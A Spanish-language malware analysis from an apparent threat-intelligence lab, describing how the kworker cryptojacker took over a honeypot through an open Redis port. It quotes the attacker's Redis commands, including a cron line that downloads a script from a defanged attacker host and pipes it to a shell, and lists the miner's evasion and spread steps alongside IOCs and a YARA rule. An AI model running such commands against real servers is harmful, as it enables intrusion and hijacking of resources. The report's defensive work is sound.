malware · cryptomining · redis · linux · honeypot · monero · 8220-gang · xmrig · worm
Kworker: el criptominero que trae su propio desinstalador
Kinryū Labs sorprendió a un criptojacker del linaje 8220 convertir un puerto Redis abierto y sin contraseña en una shell root en unos cinco segundos. El dropper, un script de shell de 636 líneas llamado kworker, desinstala los agentes de seguridad en la nube de Alibaba y Tencent con las propias herramientas de los fabricantes, dedica 200 líneas a matar mineros rivales, pone una puerta trasera en SSH, esconde un minero de Monero XMRig tras ps, top y pstree falsos, e intenta propagarse más allá.
Por Davis Zheng·
TLP:CLEAR. Autorizado para publicación. Capturado por la red de sensores honeypot de Kinryū Labs el 10 de junio de 2026. Solo análisis estático y pasivo: el dropper nunca se ejecutó y jamás se contactó con infraestructura del atacante. Los indicadores de abajo están neutralizados (defanged); la regla YARA lleva las cadenas reales a propósito, para detección. No recuperamos el binario del minero de etapa 2 ni la cartera de Monero.
Resumen ejecutivo
- ~5sde puerto Redis abierto a cuatro backdoors root en cron
- 636líneas de bash, un kit completo de toma del host
- 2desinstaladores de fabricante llevados dentro en base64
- 80+mineros rivales en la lista de objetivos
A los seis minutos pasada la medianoche UTC, algo abrió una conexión al puerto Redis de uno de nuestros honeypots, ejecutó un único INFO para ver con qué hablaba, y colgó. Dos segundos después volvió y se puso a trabajar. Para cuando se desconectó, cinco segundos en total, había reescrito la tabla cron del servidor de cuatro formas distintas y había apuntado cada una de ellas al mismo archivo: un script de shell llamado kworker.
Nunca dejamos que se ejecutara. El honeypot captura la carga útil, la hashea y la archiva; la máquina en sí se mantiene limpia. Así que lo que nos queda es el script completo, las 636 líneas, y una grabación completa de la intrusión. Leídos juntos, son un corte transversal limpio de dónde ha llegado el criptojacking de Linux de consumo en 2026, y kworker es un buen espécimen, porque hace casi todo lo que el género ha inventado jamás. También hace una cosa con cara de absoluta seriedad: desinstala tu antivirus usando el propio desinstalador del fabricante del antivirus.
Valoraciones clave
- Criptojacking de consumo del linaje 8220 Gang / kworkerds, oportunista y no dirigido (confianza media). La entrega por Redis, las herramientas de descarga renombradas, el archivo de bloqueo
/etc/javaey la enorme lista de objetivos son todos sellos de la familia. Nos mantenemos en media, y no más, porque es código ampliamente bifurcado que las cuadrillas se pasan y revenden, así que el nombre apunta a un linaje, no a un único autor. - El objetivo es minar Monero (confianza alta). Todo el propósito del script es traer y lanzar
javae, una compilación de XMRig, tras habilitar huge pages para ella. Todo lo demás existe para despejar el campo y conservar el host. - Software maduro y muy rodado, no el proyecto de fin de semana de alguien (confianza alta). Las propias líneas cron de la intrusión llaman a
cd1ywd1, herramientas que solo existen después de que kworker se instale. El kit ya se da por supuesto a sí mismo, lo cual es la marca de un código que lleva un tiempo en circulación. - La cartera ausente es deliberada (confianza alta). El script no contiene ninguna dirección de Monero ni ningún pool; ambos viven en el binario del minero, que no recuperamos. El único dato que ataría entre sí las campañas de esta cuadrilla es justo el que mantienen fuera del script, el mismo muro contra el que chocamos en RedTail.
FLUSHALL, y luego cuatro vías hacia cron
Un Redis dejado abierto a internet sin contraseña ha sido durante años una shell root de una sola línea, y la técnica aquí es la vieja fiable. Establece una clave de base de datos cuyo valor sea un trabajo cron. Dile a Redis que guarde su base de datos en la carpeta cron. Llama a SAVE. Redis escribe su base de datos en disco, incluido tu trabajo cron falso, y un minuto después cron lo ejecuta como root. Nuestro visitante tomó la huella del servidor, comprobó que podía escribir un archivo, desactivó la salvaguarda que detiene un guardado fallido y ejecutó el truco.
# lo que el visitante envió a Redis (abreviado, neutralizado)
SET backup1 "*/2 * * * * cd1 -fsSL hxxps://download.logltech[.]workers[.]dev/up/down/api/kworker | sh"
CONFIG SET dir /var/spool/cron/
CONFIG SET dbfilename root
SAVE
Toda la intrusión cabe en un puñado de segundos:
- 00:06:00 UTCConecta, envía un único
INFOpara tomar la huella del servidor, desconecta. - +2 segundosReconecta. Establece cuatro claves, cada una con una línea cron.
CONFIG SET dira la carpeta cron,CONFIG SET dbfilenameal archivo cron objetivo, desactiva stop-writes-on-bgsave-error, luegoSAVE. - +5 segundos en totalDesconecta. El honeypot tiene toda la carga útil y toda la grabación; la máquina sigue limpia.
- +1 minutoEn un host real, cron ejecuta la línea plantada como root y trae
kworker.
Lo que merece la pena ralentizar es la redundancia. No escribió un trabajo cron; escribió la misma instrucción en cuatro sitios, /var/spool/cron/root, /var/spool/cron/crontabs, /etc/cron.d/javae y /etc/crontab, cubriendo tanto la disposición de Red Hat como la de Debian y ambas sintaxis de cron. Cada línea traía kworker con una herramienta distinta, cd1, wget, curl, wd1, en un horario escalonado de dos, tres, cuatro, cinco minutos. Dos de esos nombres no son programas reales. cd1 y wd1 son lo que kworker renombra curl y wget una vez instalado. La intrusión ya da por supuesto el script que está a punto de descargar. Todo el kit es internamente coherente, que es cómo sabes que es software maduro y muy rodado y no el proyecto de fin de semana de alguien.
Trae tu propio desinstalador
En cuanto tiene root, kworker empieza a desmontar el edificio. Cortafuegos vaciado, ufw apagado, SELinux bajado a permisivo y luego desactivado en su configuración, AppArmor detenido, el NMI watchdog del kernel apagado, lo cual importa porque un minero clava la CPU al cien por cien durante semanas y el watchdog es una de las pocas cosas que podría darse cuenta. /var/log/syslog se borra del todo.
Luego va a buscar agentes de seguridad en la nube, y aquí el script deja de ser corriente. Los grandes proveedores de nube chinos incluyen un agente de host en sus VM: Aegis de Alibaba, que verás ejecutándose como AliYunDun; YunJing de Tencent; HostGuard de Huawei. kworker comprueba cada uno. Donde encuentra el de Alibaba, no se limita a matar el proceso. Ejecuta el desinstalador oficial de Alibaba, y para asegurarse de que funcione incluso en una máquina sin ruta de vuelta a Alibaba, lleva dos de los scripts de desinstalación de Alibaba codificados en base64 dentro de sí mismo. Decodificamos ambos. Son auténticos, con desmontaje de trazado kprobe incluido.
Elimina tu protección de endpoints de forma limpia, tal como pretendía el fabricante, y deja los registros bien ordenados.
Eso no es improvisación. Alguien se sentó frente a una máquina Aliyun real, sacó los desinstaladores y los integró.
Una guerra de territorio, escrita en bash
Si nunca has leído uno de estos scripts, lo que sorprende es cuánto de él apunta a otros criminales. El verdadero enemigo de un minero es el siguiente minero que intenta alquilar la misma CPU, no el administrador de sistemas. kworker dedica unas doscientas líneas a cazar competidores, y mata por cada asa que pueda agarrar.
- Por nombre de proceso, desde una lista de bloqueo de más de cien:
xmrig,kinsing,kdevtmpfsi, la familiawatchdogsywatchbog,ddg,sustes, y el más antiguokworkerdsdel que desciende su propio nombre. - Por puerto, los que ocupan los pools de minería y los bots IRC.
- Por dirección IP fija (hard-coded).
- Por CPU, el instrumento contundente: cualquier cosa que queme más del 40 por ciento del procesador bajo un nombre que no reconozca es eliminada, con la lógica de que un proceso desconocido que come CPU es, por definición, un minero rival.
Elimina sus archivos de /tmp y /dev/shm, recorta sus trabajos cron, quita los rootkits de preload que algunos instalan, y se mete en Docker para matar y borrar imágenes de minería conocidas. Este es el mismo acaparamiento de terreno que documentamos en el script clean de RedTail y en el killservice.sh de Rootpacket; todas estas cuadrillas pelean por las mismas máquinas mal configuradas, y todas abren con un barrido del campo.
También es, concreta y repetidamente, grosero con TeamTNT, deshaciendo los renombrados de curl y wget que hace TeamTNT y borrando sus directorios. Donde mata a Kinsing, sobrescribe el archivo con la palabra fuckyou y lo bloquea para que Kinsing no pueda reponerse. Aquí no hay honor, solo un acaparamiento de terreno, y kworker lo juega más duro que la mayoría.
Lee la lista con atención y se convierte en un catálogo de cómo se esconde la competencia. Un grupo de objetivos se hace pasar por hilos del kernel, kacpi_svc, kswap_svc, kthreadd_svc, ksoftirqd_svc; otro se hace pasar por demonios del sistema, polkitd, acpid, dbus-daemon--system, y systemctI con una I mayúscula donde debería ir la L. kworker caza justo los disfraces que llevan sus rivales, que son los mismos disfraces a los que él recurre unas líneas después cuando esconde javae entre nombres como systemd-network e irqbalanced. Todos en esta pelea van vestidos de aburrido ruido del sistema, y todos se han aprendido de memoria el disfraz de todos los demás.
Algunos objetivos no son nombres en absoluto. Uno es L2Jpbi9iYXN, el base64 inicial de un comando /bin/bash. kworker busca con grep ese prefijo codificado en la tabla de procesos, atrapando al cargador de un rival por el blob base64 que está en su línea de comandos.
La lista entera es larga, más de cien formas de nombrar un proceso que quieres muerto, y vale la pena ojearla una vez solo por la textura de la disputa:
La lista completa de objetivos, extraída del script capturado
Sacada de kill_miner_proc, kill_sus_proc y el barrido de Docker. Todo lo de aquí es un objetivo que kworker caza, no su propia infraestructura. Las IP están neutralizadas.
Puertos en los que mata cualquier proceso (pools de minería, bots IRC, RAT, SSH y Telnet alternativos): 23, 143, 2222, 3333, 3347, 3389, 5555, 6665, 6666, 6667, 7777, 8444, 10008, 13531.
Familias reconocibles de mineros y botnets: xmrig, xmrig-cpu, xmrig-notls, xmr-stak, mstxmr, cnrig, minerd, minergate, cryptonight, crypto-pool, moneroocean, kinsing, kdevtmpfsi, kworkerds, kworker34, watchdogs, watchd0g, watchbog, ddg, ddg.2011, sustes, sustse, sustse3, kthrotlds, ksoftirqds, tntrecht (TeamTNT), nanoWatch, sourplum, disk_genius, biosetjenkins, nullcrew.
Rivales que se ocultan como hilos del kernel: kacpi_svc, kswap_svc, kauditd_svc, kpsmoused_svc, kseriod_svc, kthreadd_svc, ksoftirqd_svc, kintegrityd_svc, kblockd_svc, native_svc.
Rivales que se ocultan como demonios del sistema: polkitd, acpid, dbus-daemon--system, irqbalance, irqbalanc1, crond64, nginxk, vmlinuz, systemctI (i mayúscula, no systemctl), systemten, systemxlv, svcupdate, netdns, netns, redis2, rsync, httpgd, haveged, voltuned, nqscheduler.
Otros payloads nombrados, scripts y marcadores por campaña: apaceha, apachiii, mixnerdx, mixtape, performedl, conns, mgwsl, pythno, jweri, lx26, i586, gddr, askdljlqw, ysaydh, bonns, donns, kxjd, nopxi, deamon, zigw, devtool, devtools, suppoie, exin, xr, jawa, ynn, servim, darwin, sysstats, Loopback, XJnRj, NXLAi, BI5zj, icb5o, wnTKYg, 2t3ik, qW3xT.2, hahwNEdB, CnzFVPLF, CvKzzZLs, OIcJi1m, IOFoqIgyC0zmf2UR, 65ccEJ7, jmxx, 2Ne80nA, C4iLM4L, Guard.sh, Duck.sh, bonn.sh, conn.sh, kw.sh, pro.sh, mr.sh, 2mr.sh, cr5.sh, he.sh, miner.sh, l.sh, z3.sh, lower.sh, ndt.sh, logo9.jpg, oracle.jpg, init10.cfg, init12.cfg, j2.conf, zer0day.ru, gitee.com.
Lanzadores ofuscados y configs soltadas: ./ppp, ./vsp, ./jvs, ./pvv, ./vpp, ./pces, ./rspce, ./jiba, ./haveged, ./watchbog, ./servceaess y sus gemelos mal escritos, mwyumwdbpq.conf, honvbsasbf.conf, mqdsflm.cf, /wl.conf, wc.confz, más el marcador de cuna base64 L2Jpbi9iYXN (el comienzo de un comando de una línea /bin/bas...).
IPs de pools y C2 de competidores a las que dispara en cuanto las ve: 45.76.122[.]92, 51.38.191[.]178, 51.15.56[.]161, 104.248.4[.]162, 89.35.39[.]78, 107.174.47[.]156, 107.174.47[.]181, 83.220.169[.]247, 51.38.203[.]146, 144.217.45[.]45, 176.31.6[.]16, 46.243.253[.]15, 200.68.17[.]196, 188.209.49[.]54, 181.214.87[.]241, 121.42.151[.]137.
Imágenes y contenedores Docker que mata y elimina: contenedores llamados pocosow, gakeaws, azulu, auto, xmr, mine, slowhttp, bash.shell; referencias de imagen pocosow, gakeaws, buster-slim, hello-, azulu, registry, xmr, monero, mine, slowhttp.
Y el instrumento contundente: cualquier cosa por encima del 40 por ciento de CPU que no coincida con javae es eliminada, como lo es cualquier cosa por encima del 10 por ciento cuyo nombre parezca un hilo del kernel entre corchetes, cualquier cosa que se ejecute desde /tmp, y todo proceso con un nombre sospechosamente largo.
Ahora no lo ves
Tras despejar el campo, esconde a su propio jugador. Reemplaza ps, top y pstree con envoltorios (wrappers) de dos líneas que llaman a los binarios reales y filtran en silencio cualquier línea que mencione el minero (javae) o el escáner que incluye (pnscan), y luego retrasa la fecha de los falsos a 2016 para que no parezcan nuevos. Ejecuta ps en una máquina infectada y el minero simplemente no está en la lista.
El minero está nombrado para desvanecerse en una tabla de procesos de todos modos: javae junto a archivos de bloqueo plantados con nombres como systemd-network, irqbalanced y kswaped, cada uno elegido para leerse como aburrido ruido del sistema.
Una clave, y un camino a los vecinos
Dos movimientos más rematan la toma de control.
Escribe la clave pública SSH del operador, cuyo comentario es solo uc1, en el authorized_keys de root y hace el archivo inmutable, de modo que advertirlo no basta; tienes que limpiar el bit de inmutabilidad antes de siquiera poder borrarlo. Es un acceso en directo que sobrevive a la limpieza del minero.
Luego intenta propagarse. Lee el known_hosts de root, la lista de cada máquina en la que esta caja ha iniciado sesión, e intenta conectarse por SSH a cada una usando las claves ya tiradas en disco, ejecutando un comando de una línea en cualquiera que lo deje entrar que trae kworker desde la dirección de respaldo y empieza toda la historia otra vez. No es un gusano rápido y se apoya en que se dejen claves sin contraseña por ahí, pero en el tipo de flota donde normalmente se dejan, con eso basta.
El minero, y la cartera que no conseguimos
A pesar de toda esa maquinaria, lo que de verdad gana dinero es soso: un segundo archivo, javae, una compilación de XMRig que mina Monero. kworker activa huge pages (vm.nr_hugepages puesto a 128, una aceleración estándar de XMRig), suelta javae en /etc y lo ejecuta.
Aquí está el hueco de este informe. No tenemos javae, y no tenemos la cartera. El script no contiene ninguna dirección de Monero ni ningún pool; esos están horneados en el binario del minero, que se obtiene en tiempo de ejecución, y el C2 no lo sirvió a ninguno de los sandboxes públicos que han mirado esta muestra, así que no hay nada que desarmar de forma pasiva. Cualquiera que analice kworker por su cuenta choca con el mismo muro. La cartera es lo único que ataría entre sí las campañas de esta cuadrilla, y es justo lo que mantienen fuera del script.
Alojado en Cloudflare, a propósito
Tanto el script como el minero vienen de download.logltech[.]workers[.]dev, una dirección de Cloudflare Workers, y eso es una elección deliberada. Workers es gratis, es HTTPS por defecto, toma prestada la reputación de Cloudflare así que pasa de largo de las listas de bloqueo de dominios, y oculta cualquier origen que el operador controle realmente. Nuestro honeypot nunca vio un servidor real; solo vio Cloudflare.
El canal de respaldo, usado por el gusano, es tutorial.clashverge[.]space, registrado a finales de febrero. Cualquier otra dirección IP fija en el script pertenece a un competidor al que quiere muerto, repartidas por máquinas de Vultr, OVH y DigitalOcean y un host de Alibaba Cloud en Hangzhou, no a este operador en absoluto. Lee las IP fijas como una lista de objetivos, no como infraestructura.
¿De quién es?
Con cuidado, entonces. Esto es criptojacking de consumo del linaje que normalmente se archiva bajo 8220 Gang, o kworkerds. Las señales están todas presentes: la entrega por inyección cron en Redis, el renombrado de curl a cd1, el archivo de bloqueo /etc/javae, el propagador pnscan, la enorme lista de objetivos. Los motores antivirus no se ponen de acuerdo en un nombre, lo cual es en sí el quid. ClamAV lo llama Rocke, Rising lo etiqueta TeamTNT, el resto solo dice CoinMiner. Estos scripts se copian, se fusionan y se revenden entre media docena de cuadrillas, y kworker mata a varias de las familias con las que está emparentado.
Trata a la familia como un vecindario, no como una huella dactilar.
El foco en los agentes de nube chinos, y un hermano de Windows en PowerShell que VirusTotal vincula a la misma muestra, completan el cuadro, pero la afirmación segura es la modesta. Ampliamente bifurcado, con motivación económica, no dirigido y no nuevo. Confianza media, y cómodos ahí.
Indicadores de compromiso
Red
| Indicador | Contexto |
|---|---|
download.logltech[.]workers[.]dev | C2 (primario), Cloudflare Workers. Sirve /up/down/api/{kworker, javae, cb.txt} |
tutorial.clashverge[.]space | C2 (respaldo), usado por el gusano. Registrado el 27 feb. 2026 |
170.9.225[.]197 | IP de origen que golpeó el honeypot Redis |
host *.workers.dev + GET bajo /up/down/api/ | Patrón de obtención de carga útil que merece una mirada atenta en el cable |
Archivos (SHA-256 / MD5)
| Archivo | SHA-256 | MD5 |
|---|---|---|
kworker (dropper) | 7420e819e6cf6d7608e475468ae0160185fe7eed0b5b4129aad3e8dabc776e30 | 501ec2da3039ebe4ca379f663232176a |
javae (minero XMRig) | no recuperado, esperado 5.685.096 bytes |
Clave SSH de puerta trasera: comentario uc1, huella de clave pública SHA256:VG0G5YwuzVAQW5JrC9RukA6Pynj3AwnFhWPCKp6TfVY. Búscala en authorized_keys por todo el parque de máquinas.
Artefactos en el host
| Ruta | Contexto |
|---|---|
/etc/kworker, /etc/javae, /etc/cron.d/javae, /tmp/{kworker,javae} | Archivos soltados |
/usr/bin/cd1 (era curl), /usr/bin/wd1 (era wget) | Herramientas de descarga renombradas |
/bin/ps.original, /bin/top.original, /bin/pstree.original | Binarios reales guardados tras envoltorios troyanizados |
/usr/bin/{kswaped, pamdicks, ip6network, irqbalanced, rctlcli, systemd-network} | Archivos de bloqueo inmutables, de nombre de un solo dígito |
vm.nr_hugepages = 128 | Huge pages habilitadas para XMRig |
De comportamiento
- Un
ps,topopstreeque en realidad es un script de shell que canaliza a través degrep -v. - Un
authorized_keysque no escribiste, terminado en el comentariouc1. - Trabajos cron que ejecutan
sh /etc/kworkerosh /tmp/kworker, y un/etc/cron.d/javaeque no debería existir. - Archivos inmutables, de nombre de un solo dígito, en
/usr/bin/kswapedy sus amigos. - Un
curly unwgetque han sido renombrados acd1ywd1. vm.nr_hugepagespuesto en silencio a 128.
Detección
Las pistas del lado del host son ruidosas una vez que las conoces, y están listadas arriba. En el cable, cualquier cosa que resuelva un host *.workers.dev y pida rutas bajo /up/down/api/ merece una mirada atenta. Aquí va una regla YARA que dispara con las cadenas estables. Lleva las cadenas reales a propósito, para detección.
rule kworker_cryptojacker_sh
{
meta:
description = "Linux kworker/javae cryptojacking installer (Redis XMRig dropper)"
author = "Kinryu Labs honeypot CTI"
reference = "7420e819...776e30" // full SHA-256 in the IOC table
tlp = "CLEAR"
strings:
$c2_1 = "download.logltech.workers.dev" ascii
$c2_2 = "tutorial.clashverge.space" ascii
$api = "/up/down/api/kworker" ascii
$lock = "/etc/javae" ascii
$miner = "miner_size=\"5685096\"" ascii
$ren1 = "mv /usr/bin/curl /usr/bin/cd1" ascii
$ren2 = "mv /usr/bin/wget /usr/bin/wd1" ascii
$bin1 = "/usr/bin/pamdicks" ascii
$bin2 = "/usr/bin/kswaped" ascii
$bin3 = "/usr/bin/rctlcli" ascii
$fn1 = "kill_miner_proc" ascii
$fn2 = "download_file_if_needed" ascii
$hide = "javae\\|pnscan" ascii
$ssh = "9p8zIVKLUHMUNC9mKqPljzxH" ascii // fragment of the uc1 key
condition:
filesize < 256KB and (
$ssh or any of ($c2_1, $c2_2) or
($api and $lock) or
($miner and 1 of ($ren1, $ren2)) or
(2 of ($bin1, $bin2, $bin3) and 1 of ($fn1, $fn2, $hide))
)
}
Qué debería cambiar esto
Nada de esto es sofisticado, y esa es la lección. kworker entró porque un puerto Redis estaba abierto sin contraseña, un error de 2018 que aún rinde en 2026. Todo lo posterior, la eliminación del EDR y el rootkit y el gusano, solo importó porque la puerta de entrada estaba sin cerrar.
- No expongas Redis, ni ningún almacén de datos, a internet, y haz que exija autenticación. Trata un servicio abierto como un compromiso de todo el host, no de un solo servicio.
- Vigila cron y
authorized_keyscomo código de producción, porque para un atacante eso es exactamente lo que son. - No trates el agente de nube de la máquina como una red de seguridad. El primer instinto de kworker fue acercarse y desinstalarlo, educadamente, con las propias herramientas del fabricante.
Mapeo de MITRE ATT&CK
| Táctica | Técnica |
|---|---|
| Initial Access | T1190 Exploit Public-Facing Application (Redis) |
| Execution | T1059.004 Unix Shell |
| Persistence | T1053.003 Cron; T1098.004 SSH Authorized Keys |
| Defense Evasion | T1562.001 Impair Defenses: Disable or Modify Tools (desinstalación de agente de nube y EDR); T1562.004 Disable or Modify System Firewall; T1070.002 Clear Linux or Mac System Logs; T1014 Rootkit (ps/top/pstree troyanizados); T1036.005 Masquerading: Match Legitimate Name; T1222.002 Linux File and Directory Permissions Modification (chattr +i); T1070.006 Timestomp (falsos con fecha retrasada) |
| Discovery | T1057 Process Discovery (caza de rivales); T1518.001 Security Software Discovery (agentes de nube); T1046 Network Service Scanning (pnscan) |
| Lateral Movement | T1021.004 Remote Services: SSH; T1570 Lateral Tool Transfer |
| Command and Control | T1071.001 Web Protocols; T1102 Web Service (Cloudflare Workers); T1105 Ingress Tool Transfer |
| Impact | T1496 Resource Hijacking (minería de Monero) |
Metodología y notas del analista
- El análisis fue estático y pasivo. El dropper nunca se ejecutó y jamás se contactó con infraestructura del atacante. Las conclusiones provienen de leer el script capturado de 636 líneas completo, decodificar los desinstaladores base64 incrustados y revisar la sesión Redis grabada.
- Los indicadores de arriba están neutralizados. La regla YARA contiene las cadenas reales a propósito, para detección.
- No tenemos el minero de etapa 2 (
javae) ni la cartera de Monero. El script no lleva ninguno; ambos viven en el binario del minero, que se obtiene en tiempo de ejecución y que el C2 no sirvió a sandboxes públicos. Recuperar la cartera requeriría una detonación en vivo con captura de red, que no realizamos. - Las muestras (el dropper y los desinstaladores decodificados) están disponibles para otros investigadores y defensores que las soliciten. Escribe a [email protected] con una breve nota sobre quién eres y para qué las necesitas.